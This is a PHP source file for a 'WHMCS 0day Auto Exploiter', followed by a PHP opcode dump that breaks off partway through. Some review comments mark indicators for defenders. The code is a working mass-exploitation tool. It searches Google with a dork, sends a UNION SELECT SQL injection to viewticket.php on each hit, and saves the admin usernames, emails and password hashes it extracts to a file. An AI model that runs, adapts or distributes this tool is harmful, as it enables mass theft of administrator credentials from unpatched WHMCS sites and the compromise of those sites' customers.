<?php /* ***************************************************** WHMCS 0day Auto Exploiter <= 5.2.8 Coded by g00n - Skype: t3hg00n wwww.xploiter.net ***************************************************** */ /* NOTE(review), defender's reading: this file is a mass-scanning tool, not a single-target proof of concept. It takes a search query from the "dork" form field, walks up to 50 pages of search results via google_that(), sends each hit through check_vuln(), and appends whatever comes back to WMCS-Hashes.txt. The banner claims WHMCS <= 5.2.8 is affected; the fixed release is not stated in this file, so confirm it against the vendor advisory. Treat every tbladmins credential on an exposed, unpatched install as compromised and rotate it. */ set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); function letItBy(){ ob_flush(); flush(); } function getAlexa($url) { $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url); $rank1 = $xml->SD[1]; if($rank1) $rank = $rank1->POPULARITY->attributes()->TEXT; else $rank = 0; return $rank; } function google_that($query, $page=1) { $resultPerPage=8; $start = $page*$resultPerPage; $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); $resultFromGoogle = json_decode( http_get($url, true) ,true); if(isset($resultFromGoogle['responseStatus'])) { if($resultFromGoogle['responseStatus'] != '200') return false; if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; else return $resultFromGoogle['responseData']['results']; } else die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url ); } /* http_get(): plain cURL GET that follows redirects and returns the body; $safemode only adds a one-second sleep before the request. The curl_close() after the return is unreachable and is written without a handle argument. */ function http_get($url, $safemode = false){ if($safemode === true) sleep(1); $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close(); } /* check_vuln(): rewrites the result URL to a sibling viewticket.php (any "/admin" substring is stripped) and POSTs an array-shaped tid parameter (tid[sqltype], tid[value]) carrying a UNION SELECT over tbladmins. Indicators a defender can search web-server and WAF logs for, all visible in this function: a POST to viewticket.php with tid[sqltype]=TABLEJOIN, the fixed MSIE 6.0 User-Agent string, and the 0x3a3a3a3a3a (":::::") delimiter wrapped around returned rows. Returns the matched rows, or the string "Fail!". TLS peer verification is disabled and the cURL handle is never closed. */ function check_vuln($url) { $url = dirname($url) . 
'/viewticket.php'; $url = str_replace("/admin","",$url); $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a​) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#"; $curl_connection = curl_init($url); if($curl_connection != false) { curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post); $source = curl_exec($curl_connection); preg_match_all('/:::::(.*?):::::/s',$source,$infoz); if($infoz[0]) { return $infoz[0]; } else return "Fail!"; } else return "Fail!"; } ?> <html> <head> <title>WHMCS Auto Xploiter - by g00n</title> </head> <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;"> <STYLE> textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;} input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20} body { font-family: Tahoma } tr { BORDER: dashed 1px #333; color: #FFF; } td { BORDER: dashed 1px #333; color: #FFF; } .table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #FFF; } .td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 7pt Verdana; color: Green; } .tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #FFF; } table { BORDER: dashed 1px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: Black; color: #FFF; } input { border : dashed 1px; border-color : #333; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: Red; } select { BORDER-RIGHT: Black 1px solid; 
BORDER-TOP: #DF0000 1px solid; BORDER-LEFT: #DF0000 1px solid; BORDER-BOTTOM: Black 1px solid; BORDER-color: #FFF; BACKGROUND-COLOR: Black; font: 8pt Verdana; color: Red; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #FFF; } textarea { border : dashed 1px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; } BODY { SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF margin: 1px; color: Red; background-color: Black; } .main { margin : -287px 0px 0px -490px; BORDER: dashed 1px #333; BORDER-COLOR: #333333; } .tt { background-color: Black; } A:link { COLOR: White; TEXT-DECORATION: none } A:visited { COLOR: White; TEXT-DECORATION: none } A:hover { color: Red; TEXT-DECORATION: none } A:active { color: Red; TEXT-DECORATION: none } #result{margin:10px;} #result span{display:block;} #result .Y{background-color:green;} #result .X{background-color:red;} </STYLE> <script language=\'javascript\'> function hide_div(id) { document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\'; } function show_div(id) { document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\'; } function change_divst(id) { if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id); } </script> </td></table></tr> <br> <br> <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide"> <style> body { font-family: 'Audiowide', serif; font-size: 30px; } </style> </head> <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia"> <center> <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font> <br> <font color="white" size="4">[For WHMCS ver. 
<= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font> </font> <br><br> <table border=1 bordercolor=red> <tr> <td width="700"> <br /> <center> <form method="post"> Google Dork: &nbsp;&nbsp; <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" /> &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/> </form> <?php /* Driver loop: runs only when a non-empty "dork" was posted. Each result URL is probed with check_vuln() and looked up with getAlexa(); hits are appended to WMCS-Hashes.txt and echoed to the page. NOTE(review): $data, unescapedUrl and titleNoFormatting originate from remote servers and are echoed without escaping, so anyone opening this page in a browser during analysis is rendering third-party markup; examine it as text only. */ if(isset($_POST['dork']{0})) { $file = fopen("WMCS-Hashes.txt","a"); echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>'; letItBy(); for($googlePage = 1; $googlePage <= 50; $googlePage++) { $googleResult = google_that($_POST['dork'], $googlePage); if(!$googleResult) { echo 'Finished scanning.'; fclose($file); break; } for($victim = 0; $victim < sizeof($googleResult); $victim++){ $result = check_vuln($googleResult[$victim]['unescapedUrl']); $alexa = getAlexa($googleResult[$victim]['unescapedUrl']); if($result != "Fail!") { $hashes = ""; foreach ($result as $record) { $hashes = $hashes . str_replace(':::::','',$record) . "\n"; } $sep = "========================================================\n"; $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n"; fwrite($file,$data); echo "<br /><font color=\"green\">Successfully Xploited...</font>"; echo '<span class="Y">'; echo "<pre>" . $data . 
"</pre></span><br />"; } else { echo '<span class="X">'; echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>"; echo "</span>\n<br />"; } letItBy(); } } echo '</div>'; } ?> </center> </td> </table> <br /><br /> <font face="Audiowide" color="red" size="2"> Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br /> <br > <font color="green">For more tools/scripts/exploits/etc.</font> <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a> </font> </center> </body> </html>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 22
Branch analysis from position: 15
1 jumps found. (Code = 42) Position 1 = 23
Branch analysis from position: 23
2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 125
Branch analysis from position: 29
1 jumps found. (Code = 42) Position 1 = 122
Branch analysis from position: 122
2 jumps found. (Code = 44) Position 1 = 124, Position 2 = 39
Branch analysis from position: 124
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 39
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 53
Branch analysis from position: 48
1 jumps found. (Code = 42) Position 1 = 124
Branch analysis from position: 124
Branch analysis from position: 53
1 jumps found. (Code = 42) Position 1 = 118
Branch analysis from position: 118
2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55
Branch analysis from position: 121
2 jumps found. (Code = 44) Position 1 = 124, Position 2 = 39
Branch analysis from position: 124
Branch analysis from position: 39
Branch analysis from position: 55
2 jumps found. (Code = 43) Position 1 = 69, Position 2 = 103
Branch analysis from position: 69
2 jumps found. (Code = 77) Position 1 = 71, Position 2 = 81
Branch analysis from position: 71
2 jumps found. (Code = 78) Position 1 = 72, Position 2 = 81
Branch analysis from position: 72
1 jumps found. (Code = 42) Position 1 = 71
Branch analysis from position: 71
Branch analysis from position: 81
1 jumps found. (Code = 42) Position 1 = 115
Branch analysis from position: 115
2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55
Branch analysis from position: 121
Branch analysis from position: 55
Branch analysis from position: 81
Branch analysis from position: 103
2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55
Branch analysis from position: 121
Branch analysis from position: 55
Branch analysis from position: 125
Branch analysis from position: 22
2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 125
Branch analysis from position: 29
Branch analysis from position: 125
filename:       /in/OQ1nP
function name:  (null)
number of ops:  127
compiled vars:  !0 = $file, !1 = $googlePage, !2 = $googleResult, !3 = $victim, !4 = $result, !5 = $alexa, !6 = $hashes, !7 = $record, !8 = $sep, !9 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    9     0  E >   INIT_FCALL                                               'set_time_limit'
          1        SEND_VAL                                                 0
          2        DO_ICALL                                                 
   10     3        INIT_FCALL                                               'ini_set'
          4        SEND_VAL                                                 'memory_limit'
          5        SEND_VAL                                                 '64M'
          6        DO_ICALL                                                 
   11     7        INIT_FCALL                                               'header'
          8        SEND_VAL                                                 'Content-Type%3A+text%2Fhtml%3B+charset%3DUTF-8'
          9        DO_ICALL                                                 
   75    10        ECHO                                                     '%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3EWHMCS+Auto+Xploiter+-+by+g00n%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+style%3D%22background-image%3A+url%28%27http%3A%2F%2Fi.imgur.com%2FzHNCk2e.gif%27%29%3B+background-repeat%3A+repeat%3B+background-position%3A+center%3B+background-attachment%3A+fixed%3B%22%3E%0A%0A%3CSTYLE%3E%0Atextarea%7Bbackground-color%3A%23105700%3Bcolor%3Alime%3Bfont-weight%3Abold%3Bfont-size%3A+20px%3Bfont-family%3A+Tahoma%3B+border%3A+1px+solid+%23000000%3B%7D%0Ainput%7BFONT-WEIGHT%3Anormal%3Bbackground-color%3A+%23105700%3Bfont-size%3A+15px%3Bfont-weight%3Abold%3Bcolor%3A+lime%3B+font-family%3A+Tahoma%3B+border%3A+1px+solid+%23666666%3Bheight%3A20%7D%0Abody+%7B%0Afont-family%3A+Tahoma%0A%7D%0Atr+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atd+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0A.table1+%7B%0ABORDER%3A+0px+Black%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Acolor%3A+%23FFF%3B%0A%7D%0A.td1+%7B%0ABORDER%3A+0px%3B%0ABORDER-COLOR%3A+%23333333%3B%0Afont%3A+7pt+Verdana%3B%0Acolor%3A+Green%3B%0A%7D%0A.tr1+%7B%0ABORDER%3A+0px%3B%0ABORDER-COLOR%3A+%23333333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atable+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0ABORDER-COLOR%3A+%23333333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Ainput+%7B%0Aborder++++++++++++%3A+dashed+1px%3B%0Aborder-color++++++++%3A+%23333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+8pt+Verdana%3B%0Acolor%3A+Red%3B%0A%7D%0Aselect+%7B%0ABORDER-RIGHT%3A++Black+1px+solid%3B%0ABORDER-TOP%3A++++%23DF0000+1px+solid%3B%0ABORDER-LEFT%3A+++%23DF0000+1px+solid%3B%0ABORDER-BOTTOM%3A+Black+1px+solid%3B%0ABORDER-color%3A+%23FFF%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+8pt+Verdana%3B%0Acolor%3A+Red%3B%0A%7D%0Asubmit+%7B%0ABORDER%3A++buttonhighlight+2px+outset%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Awidth%3A+30%25%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atextarea+%7B%0Aborder++++++++++++%3A+dashed+1px+%23333%3B%
0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+Fixedsys+bold%3B%0Acolor%3A+%23999%3B%0A%7D%0ABODY+%7B%0A++++SCROLLBAR-FACE-COLOR%3A+Black%3B+SCROLLBAR-HIGHLIGHT-color%3A+%23FFF%3B+SCROLLBAR-SHADOW-color%3A+%23FFF%3B+SCROLLBAR-3DLIGHT-color%3A+%23FFF%3B+SCROLLBAR-ARROW-COLOR%3A+Black%3B+SCROLLBAR-TRACK-color%3A+%23FFF%3B+SCROLLBAR-DARKSHADOW-color%3A+%23FFF%0Amargin%3A+1px%3B%0Acolor%3A+Red%3B%0Abackground-color%3A+Black%3B%0A%7D%0A.main+%7B%0Amargin++++++++++++%3A+-287px+0px+0px+-490px%3B%0ABORDER%3A+dashed+1px+%23333%3B%0ABORDER-COLOR%3A+%23333333%3B%0A%7D%0A.tt+%7B%0Abackground-color%3A+Black%3B%0A%7D%0A%0AA%3Alink+%7B%0A++++COLOR%3A+White%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Avisited+%7B%0A++++COLOR%3A+White%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Ahover+%7B%0A++++color%3A+Red%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Aactive+%7B%0A++++color%3A+Red%3B+TEXT-DECORATION%3A+none%0A%7D%0A%0A%23result%7Bmargin%3A10px%3B%7D%0A%23result+span%7Bdisplay%3Ablock%3B%7D%0A%23result+.Y%7Bbackground-color%3Agreen%3B%7D%0A%23result+.X%7Bbackground-color%3Ared%3B%7D%0A%3C%2FSTYLE%3E%0A%3Cscript+language%3D%5C%27javascript%5C%27%3E%0Afunction+hide_div%28id%29%0A%7B%0A++document.getElementById%28id%29.style.display+%3D+%5C%27none%5C%27%3B%0A++document.cookie%3Did%2B%5C%27%3D0%3B%5C%27%3B%0A%7D%0Afunction+show_div%28id%29%0A%7B%0A++document.getElementById%28id%29.style.display+%3D+%5C%27block%5C%27%3B%0A++document.cookie%3Did%2B%5C%27%3D1%3B%5C%27%3B%0A%7D%0Afunction+change_divst%28id%29%0A%7B%0A++if+%28document.getElementById%28id%29.style.display+%3D%3D+%5C%27none%5C%27%29%0A++++show_div%28id%29%3B%0A++else%0A++++hide_div%28id%29%3B%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Ftd%3E%3C%2Ftable%3E%3C%2Ftr%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3Clink+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22+href%3D%22http%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DAudiowide%22%3E%0A++++%3Cstyle%3E%0A++++++body+%7B%0A++++++++font-family%3A+%27Audiowide%27%2C+serif%3B%0A++++++++font-size%3A+30px%3B%0A++++++++%0A++++++%7D%0A++
++%3C%2Fstyle%3E%0A++%3C%2Fhead%3E%0A%0A++%3Cbody+onLoad%3D%22type_text%28%29%22+%3B+bgColor%3D%23000000+text%3D%2300FFFF+background%3D%22Fashion+fuchsia%22%3E%0A++++%3Ccenter%3E%0A%3Cfont+face%3D%22Audiowide%22+color%3D%22red%22%3EWHMCS+Auto+Xploiter+%3Cfont+color%3D%22green%22%3E%280day%29%3C%2Ffont%3E%0A%3Cbr%3E%0A%3Cfont+color%3D%22white%22+size%3D%224%22%3E%5BFor+WHMCS+ver.+%3C%3D+%3C%2Ffont%3E%3Cfont+color%3D%22green%22+size%3D%224%22%3E5.2.8%3C%2Ffont%3E%3Cfont+color%3D%22white%22+size%3D%224%22%3E%5D%3C%2Ffont%3E%0A%3C%2Ffont%3E%0A%3Cbr%3E%3Cbr%3E%0A%0A%3Ctable+border%3D1+bordercolor%3Dred%3E%0A%3Ctr%3E%0A%3Ctd+width%3D%22700%22%3E%0A%3Cbr+%2F%3E%0A%3Ccenter%3E%0A++++%3Cform+method%3D%22post%22%3E%0A++++++++Google+Dork%3A+%26nbsp%3B%26nbsp%3B%0A++++++++%3Cinput+type%3D%22text%22+id%3D%22dork%22+size%3D%2230%22+name%3D%22dork%22+value%3D%22'
  226    11        FETCH_IS                                         ~13     '_POST'
         12        FETCH_DIM_IS                                     ~14     ~13, 'dork'
         13        ISSET_ISEMPTY_DIM_OBJ                         0          ~14, 0
         14      > JMPZ                                                     ~15, ->22
         15    >   INIT_FCALL                                               'htmlentities'
         16        FETCH_R                      global              ~16     '_POST'
         17        FETCH_DIM_R                                      ~17     ~16, 'dork'
         18        SEND_VAL                                                 ~17
         19        DO_ICALL                                         $18     
         20        QM_ASSIGN                                        ~19     $18
         21      > JMP                                                      ->23
         22    >   QM_ASSIGN                                        ~19     'inurl%3Asubmitticket.php'
         23    >   ECHO                                                     ~19
         24        ECHO                                                     '%22+%2F%3E%0A++++++++%26nbsp%3B%26nbsp%3B%3Cinput+type%3D%22submit%22+value%3D%22Xploit%21%22+id%3D%22button%22%2F%3E%0A++++%3C%2Fform%3E%0A'
  230    25        FETCH_IS                                         ~20     '_POST'
         26        FETCH_DIM_IS                                     ~21     ~20, 'dork'
         27        ISSET_ISEMPTY_DIM_OBJ                         0          ~21, 0
         28      > JMPZ                                                     ~22, ->125
  231    29    >   INIT_FCALL                                               'fopen'
         30        SEND_VAL                                                 'WMCS-Hashes.txt'
         31        SEND_VAL                                                 'a'
         32        DO_ICALL                                         $23     
         33        ASSIGN                                                   !0, $23
  232    34        ECHO                                                     '%3Cbr+%2F%3E%3Cdiv+id%3D%22result%22%3E%3Cb%3EScanning+has+been+started...+Good+luck%21+%3B%29%3C%2Fb%3E%3Cbr%3E%3Cbr%3E'
  233    35        INIT_FCALL                                               'letitby'
         36        DO_FCALL                                      0          
  234    37        ASSIGN                                                   !1, 1
         38      > JMP                                                      ->122
  235    39    >   INIT_FCALL                                               'google_that'
         40        FETCH_R                      global              ~27     '_POST'
         41        FETCH_DIM_R                                      ~28     ~27, 'dork'
         42        SEND_VAL                                                 ~28
         43        SEND_VAR                                                 !1
         44        DO_FCALL                                      0  $29     
         45        ASSIGN                                                   !2, $29
  236    46        BOOL_NOT                                         ~31     !2
         47      > JMPZ                                                     ~31, ->53
  237    48    >   ECHO                                                     'Finished+scanning.'
  238    49        INIT_FCALL                                               'fclose'
         50        SEND_VAR                                                 !0
         51        DO_ICALL                                                 
  239    52      > JMP                                                      ->124
  242    53    >   ASSIGN                                                   !3, 0
         54      > JMP                                                      ->118
  243    55    >   INIT_FCALL                                               'check_vuln'
         56        FETCH_DIM_R                                      ~34     !2, !3
         57        FETCH_DIM_R                                      ~35     ~34, 'unescapedUrl'
         58        SEND_VAL                                                 ~35
         59        DO_FCALL                                      0  $36     
         60        ASSIGN                                                   !4, $36
  244    61        INIT_FCALL                                               'getalexa'
         62        FETCH_DIM_R                                      ~38     !2, !3
         63        FETCH_DIM_R                                      ~39     ~38, 'unescapedUrl'
         64        SEND_VAL                                                 ~39
         65        DO_FCALL                                      0  $40     
         66        ASSIGN                                                   !5, $40
  245    67        IS_NOT_EQUAL                                             !4, 'Fail%21'
         68      > JMPZ                                                     ~42, ->103
  246    69    >   ASSIGN                                                   !6, ''
  247    70      > FE_RESET_R                                       $44     !4, ->81
         71    > > FE_FETCH_R                                               $44, !7, ->81
  248    72    >   INIT_FCALL                                               'str_replace'
         73        SEND_VAL                                                 '%3A%3A%3A%3A%3A'
         74        SEND_VAL                                                 ''
         75        SEND_VAR                                                 !7
         76        DO_ICALL                                         $45     
         77        CONCAT                                           ~46     !6, $45
         78        CONCAT                                           ~47     ~46, '%0A'
         79        ASSIGN                                                   !6, ~47
  247    80      > JMP                                                      ->71
         81    >   FE_FREE                                                  $44
  250    82        ASSIGN                                                   !8, '%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A'
  251    83        FETCH_DIM_R                                      ~50     !2, !3
         84        FETCH_DIM_R                                      ~51     ~50, 'unescapedUrl'
         85        CONCAT                                           ~52     !8, ~51
         86        CONCAT                                           ~53     ~52, '+-+Alexa%3A+'
         87        CONCAT                                           ~54     ~53, !5
         88        CONCAT                                           ~55     ~54, '%0A'
         89        CONCAT                                           ~56     ~55, !8
         90        CONCAT                                           ~57     ~56, !6
         91        CONCAT                                           ~58     ~57, '%0A'
         92        ASSIGN                                                   !9, ~58
  252    93        INIT_FCALL                                               'fwrite'
         94        SEND_VAR                                                 !0
         95        SEND_VAR                                                 !9
         96        DO_ICALL                                                 
  253    97        ECHO                                                     '%3Cbr+%2F%3E%3Cfont+color%3D%22green%22%3ESuccessfully+Xploited...%3C%2Ffont%3E'
  254    98        ECHO                                                     '%3Cspan+class%3D%22Y%22%3E'
  255    99        CONCAT                                           ~61     '%3Cpre%3E', !9
        100        CONCAT                                           ~62     ~61, '%3C%2Fpre%3E%3C%2Fspan%3E%3Cbr+%2F%3E'
        101        ECHO                                                     ~62
        102      > JMP                                                      ->115
  259   103    >   ECHO                                                     '%3Cspan+class%3D%22X%22%3E'
  260   104        ROPE_INIT                                     5  ~68     '%3Ca+href%3D%22'
        105        FETCH_DIM_R                                      ~63     !2, !3
        106        FETCH_DIM_R                                      ~64     ~63, 'unescapedUrl'
        107        ROPE_ADD                                      1  ~68     ~68, ~64
        108        ROPE_ADD                                      2  ~68     ~68, '%22+target%3D%27_blank%27%3E'
        109        FETCH_DIM_R                                      ~65     !2, !3
        110        FETCH_DIM_R                                      ~66     ~65, 'titleNoFormatting'
        111        ROPE_ADD                                      3  ~68     ~68, ~66
        112        ROPE_END                                      4  ~67     ~68, '%3C%2Fa%3E+-+%3Cfont+color%3D%22black%22%3EFailed%21%3C%2Ffont%3E'
        113        ECHO                                                     ~67
  261   114        ECHO                                                     '%3C%2Fspan%3E%0A%3Cbr+%2F%3E'
  263   115    >   INIT_FCALL                                               'letitby'
        116        DO_FCALL                                      0          
  242   117        PRE_INC                                                  !3
        118    >   COUNT                                            ~73     !2
        119        IS_SMALLER                                               !3, ~73
        120      > JMPNZ                                                    ~74, ->55
  234   121    >   PRE_INC                                                  !1
        122    >   IS_SMALLER_OR_EQUAL                                      !1, 50
        123      > JMPNZ                                                    ~76, ->39
  266   124    >   ECHO                                                     '%3C%2Fdiv%3E'
  269   125    >   ECHO                                                     '%3C%2Fcenter%3E%0A%3C%2Ftd%3E%0A%3C%2Ftable%3E%0A%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%3Cfont+face%3D%22Audiowide%22+color%3D%22red%22+size%3D%222%22%3E%0ACoded+by%3A+%3Cfont+color%3D%22white%22%3Eg00n%3C%2Ffont%3E+%3Cfont+color%3D%22white%22%3E%7C%3C%2Ffont%3E+Skype%3A+%3Cfont+color%3D%22white%22%3E%3Ca+href%3D%22Skype%3At3hg00n%22%3Et3hg00n%3C%2Fa%3E%3C%2Ffont%3E%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%3Cbr+%3E+%3Cfont+color%3D%22green%22%3EFor+more+tools%2Fscripts%2Fexploits%2Fetc.%3C%2Ffont%3E%0A%3Cbr+%2F%3Evisit+%3Ca+href%3D%22http%3A%2F%2Fxploiter.net%22+target%3D%22_blank%22+style%3D%22text-decoration%3A+none%3B%22%3Ewww.Xploiter.net%3C%2Fa%3E%0A%3C%2Ffont%3E%0A%0A%3C%2Fcenter%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E'
  281   126      > RETURN                                                   1

Function letitby:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/OQ1nP
function name:  letItBy
number of ops:  5
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   12     0  E >   INIT_FCALL                                               'ob_flush'
          1        DO_ICALL                                                 
          2        INIT_FCALL                                               'flush'
          3        DO_ICALL                                                 
          4      > RETURN                                                   null

End of function letitby

Function getalexa:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 10, Position 2 = 16
Branch analysis from position: 10
1 jumps found. (Code = 42) Position 1 = 17
Branch analysis from position: 17
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 16
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/OQ1nP
function name:  getAlexa
number of ops:  19
compiled vars:  !0 = $url, !1 = $xml, !2 = $rank1, !3 = $rank
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   13     0  E >   RECV                                             !0      
   15     1        INIT_FCALL                                               'simplexml_load_file'
          2        CONCAT                                           ~4      'http%3A%2F%2Fdata.alexa.com%2Fdata%3Fcli%3D10%26dat%3Dsnbamz%26url%3D', !0
          3        SEND_VAL                                                 ~4
          4        DO_ICALL                                         $5      
          5        ASSIGN                                                   !1, $5
   16     6        FETCH_OBJ_R                                      ~7      !1, 'SD'
          7        FETCH_DIM_R                                      ~8      ~7, 1
          8        ASSIGN                                                   !2, ~8
   17     9      > JMPZ                                                     !2, ->16
   18    10    >   FETCH_OBJ_R                                      ~10     !2, 'POPULARITY'
         11        INIT_METHOD_CALL                                         ~10, 'attributes'
         12        DO_FCALL                                      0  $11     
         13        FETCH_OBJ_R                                      ~12     $11, 'TEXT'
         14        ASSIGN                                                   !3, ~12
         15      > JMP                                                      ->17
   20    16    >   ASSIGN                                                   !3, 0
   21    17    > > RETURN                                                   !3
   22    18*     > RETURN                                                   null

End of function getalexa

Function google_that:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 26, Position 2 = 41
Branch analysis from position: 26
2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 30
Branch analysis from position: 29
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 30
2 jumps found. (Code = 43) Position 1 = 35, Position 2 = 37
Branch analysis from position: 35
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 37
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 41
1 jumps found. (Code = 79) Position 1 = -2
filename:       /in/OQ1nP
function name:  google_that
number of ops:  44
compiled vars:  !0 = $query, !1 = $page, !2 = $resultPerPage, !3 = $start, !4 = $url, !5 = $resultFromGoogle
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   24     0  E >   RECV                                             !0      
          1        RECV_INIT                                        !1      1
   26     2        ASSIGN                                                   !2, 8
   27     3        MUL                                              ~7      !1, !2
          4        ASSIGN                                                   !3, ~7
   28     5        ROPE_INIT                                     5  ~10     'http%3A%2F%2Fajax.googleapis.com%2Fajax%2Fservices%2Fsearch%2Fweb%3Fv%3D1.0%26hl%3Diw%26rsz%3D'
          6        ROPE_ADD                                      1  ~10     ~10, !2
          7        ROPE_ADD                                      2  ~10     ~10, '%26start%3D'
          8        ROPE_ADD                                      3  ~10     ~10, !3
          9        ROPE_END                                      4  ~9      ~10, '%26q%3D'
         10        INIT_FCALL                                               'urlencode'
         11        SEND_VAR                                                 !0
         12        DO_ICALL                                         $13     
         13        CONCAT                                           ~14     ~9, $13
         14        ASSIGN                                                   !4, ~14
   29    15        INIT_FCALL                                               'json_decode'
         16        INIT_FCALL_BY_NAME                                       'http_get'
         17        SEND_VAR_EX                                              !4
         18        SEND_VAL_EX                                              <true>
         19        DO_FCALL                                      0  $16     
         20        SEND_VAR                                                 $16
         21        SEND_VAL                                                 <true>
         22        DO_ICALL                                         $17     
         23        ASSIGN                                                   !5, $17
